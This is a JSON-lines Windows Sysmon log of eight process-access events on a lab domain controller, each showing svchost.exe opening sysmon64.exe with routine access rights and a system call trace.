{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3477,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.664\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.664","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3478,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.664\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.664","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3479,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.664\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.664","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3480,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.664\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.664","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3481,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.664\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.664","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3482,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.664\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.664","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3483,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.664\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.664","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3484,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.664\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.664","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
